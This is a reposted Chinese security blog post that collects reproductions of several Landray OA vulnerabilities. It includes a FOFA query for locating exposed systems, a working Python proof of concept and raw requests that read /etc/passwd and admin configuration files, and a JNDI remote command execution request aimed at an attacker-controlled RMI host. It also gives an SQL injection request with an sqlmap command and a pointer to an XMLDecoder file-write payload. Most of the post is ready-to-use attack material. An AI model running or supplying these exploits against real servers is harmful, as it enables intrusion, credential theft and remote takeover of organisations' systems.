碼上快樂

相關內容    簡體    繁體

【漏洞復現】藍凌OA近期公開幾個漏洞匯總

本文轉載自   查看原文   2021-07-02 09:22   1018    藍凌OA漏洞復現/ 藍凌OA近期公開幾個漏洞匯總/ 藍凌OA漏洞匯總/ 藍凌OA

0x00 藍凌OA custom.jsp 任意文件讀取漏洞

1、app=”Landray-OA系統”

2、漏洞復現

出現漏洞的文件為 custom.jsp

<%@page import="com.landray.kmss.util.ResourceUtil"%>
<%@page import="net.sf.json.JSONArray"%>
<%@page import="net.sf.json.JSONObject"%>
<%@ page language="java" pageEncoding="UTF-8"%>
<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
<%
 JSONObject vara =
JSONObject.fromObject(request.getParameter("var"));
 JSONObject body = JSONObject.fromObject(vara.get("body"));
%>
<c:import url='<%=body.getString("file") %>'>
 <c:param name="var" value="${ param['var'] }"></c:param>
</c:import>

請求包為

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={“body”:{“file”:”file:///etc/passwd”}}

3、漏洞POC:

#!/usr/bin/python3
#-*- coding:utf-8 -*-

import base64
import requests
import random
import re
import json
import sys

def title():
    print('+------------------------------------------')
    print('+  \033[34mVersion: 藍凌OA 任意文件讀取                                          \033[0m')
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
    print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"
    headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
                "Content-Type": "application/x-www-form-urlencoded"
    }
    data = 'var={"body":{"file":"file:///etc/passwd"}}'
    try:
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10)
        print("\033[36m[o] 正在請求 {}/sys/ui/extend/varkind/custom.jsp \033[0m".format(target_url))
        if "root:" in response.text and response.status_code == 200:
            print("\033[36m[o] 成功讀取 /etc/passwd \n[o] 響應為:{} \033[0m".format(response.text))

    except Exception as e:
        print("\033[31m[x] 請求失敗:{} \033[0m".format(e))
        sys.exit(0)

#
if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl   >>> \033[0m"))
    POC_1(target_url)

4、使用xescan直接進行漏洞解碼,調回明文密碼:

0x01 藍凌OA SSRF+JNDI遠程命令執行

漏洞復現:

利用 藍凌OA custom.jsp 任意文件讀取漏洞 讀取配置文件

/WEB-INF/KmssConfig/admin.properties
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

同時進行密碼的讀取,其實個0x00的漏洞是一樣的,但是JNDI的遠程命令執行,需要配合后台密碼進行執行,沒有密碼,但是有ssrf的讀取是沒有用處的,因為web系統可能更改了默認安裝的路徑,導致讀取不到

進入后台后,使用工具執行命令

https://github.com/welk1n/JNDI-Injection-Exploit 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

運行工具監聽端口 ping dnslog測試 命令執行 (藍凌OA 默認使用的是 JDK 1.7)

POST /admin.do HTTP/1.1
Host: 
Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967
Content-Length: 70
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin: 
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg

0x02 藍凌OA EKP 后台SQL注入漏洞 CNVD-2021-01363

存在SQL注入的 Url為,這里拿官方的演示站點演示漏洞過程

https://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true

其中存在SQL注入的參數為 ordeby , 數據包如下

```

GET /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: UM_distinctid=1785f7392888e1-02ece8c7e9a996-5771031-1fa400-1785f73928943d; landray_danyuan=null; landray_guanjianci=null; landray_sorce=baidupinzhuanwy; landray_jihua=null; JSESSIONID=232B6933CF33B5422F9D2649739D48FE; Hm_lvt_223eecc93377a093d4111a2d7ea28f51=1616509114,1616566341,1616566350; Hm_lpvt_223eecc93377a093d4111a2d7ea28f51=1616566350; Hm_lvt_d14cb406f01f8101884d7cf81981d8bb=1616509114,1616566341,1616566350; Hm_lpvt_d14cb406f01f8101884d7cf81981d8bb=1616566507; Hm_lvt_95f4f43e7aa1fe68a51c44ae4eed925d=1616509872,1616509969,1616509973,1616566507; Hm_lpvt_95f4f43e7aa1fe68a51c44ae4eed925d=1616566507; Hm_lvt_22f1fea4412727d23e6a998a4b46f2ab=1616509872,1616509969,1616509973,1616566507; Hm_lpvt_22f1fea4412727d23e6a998a4b46f2ab=1616566507; fd_name=%E5%95%8A%E7%9A%84%E5%93%88; fd_id=1785f817dd0f5a4beaa482646cb9a2d8; nc_phone=15572002383; j_lang=zh-CN; LtpaToken=AAECAzYwNUFEOEZBNjA1QjgxQkFsdW9stJ5e1pcW1hgQi3cOa0iEyAhdZZs=; Hm_lvt_95cec2a2f107db33ad817ed8e4a3073b=1616510026,1616566523; Hm_lpvt_95cec2a2f107db33ad817ed8e4a3073b=1616566523; add_customer=0

```

 

保存為文件,使用 Sqlmap 跑一下注入

sqlmap -r sql.txt -p orderby --dbs

0x03 藍凌OA 任意文件寫入漏洞

/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]

漏洞在/sys/search/sys_search_main/sysSearchMain.do method 為 editrParam。

參數為 FdParameters,在 com.landray.kmss.sys.search.jar 中的 com.landray.kmss.sys.search.actions.SysSearchMainAction 類。

method 為 editrParam。 對 fdParemNames 的內容進行了判空。

如果不為空,進入 SysSearchDictUtil.getParamConditionEntry 方法。

也是對 fdParemNames 進行了一次判空。

然后傳入 ObjectXML.objectXMLDecoderByString 方法。

將傳入進來的 string 字符進行替換。

將其載入字節數組緩沖區,在傳遞給 objectXmlDecoder。

在 objectXmlDecoder 中。就更明顯了。典型的 xmlDecoder 反序列化。

整體流程只對 FdParameters 的內容進行了一些內容替換。 導致 xmlDecoder 反序列化漏洞。

利用方式: Xmldecoder payload 生成

https://github.com/mhaskar/XMLDecoder-payload-gene…

 

轉載請注明:Adminxe's Blog » 【漏洞復現】藍凌OA近期公開幾個漏洞匯總


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 藍凌OA任意寫入漏洞 藍凌OA前台任意文件讀取漏洞利用 EternalBlue永恆之藍漏洞復現 通達oa getshell漏洞復現 復現“永恆之藍”漏洞利用現象 Metasploit簡單使用——復現永恆之藍漏洞 通達OA 11.5 sql注入漏洞復現 通達OA 11.2后台getshell漏洞復現 最新通達OA-getshell 漏洞復現 漏洞復現--通達OA前台任意用戶偽造登錄漏洞
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM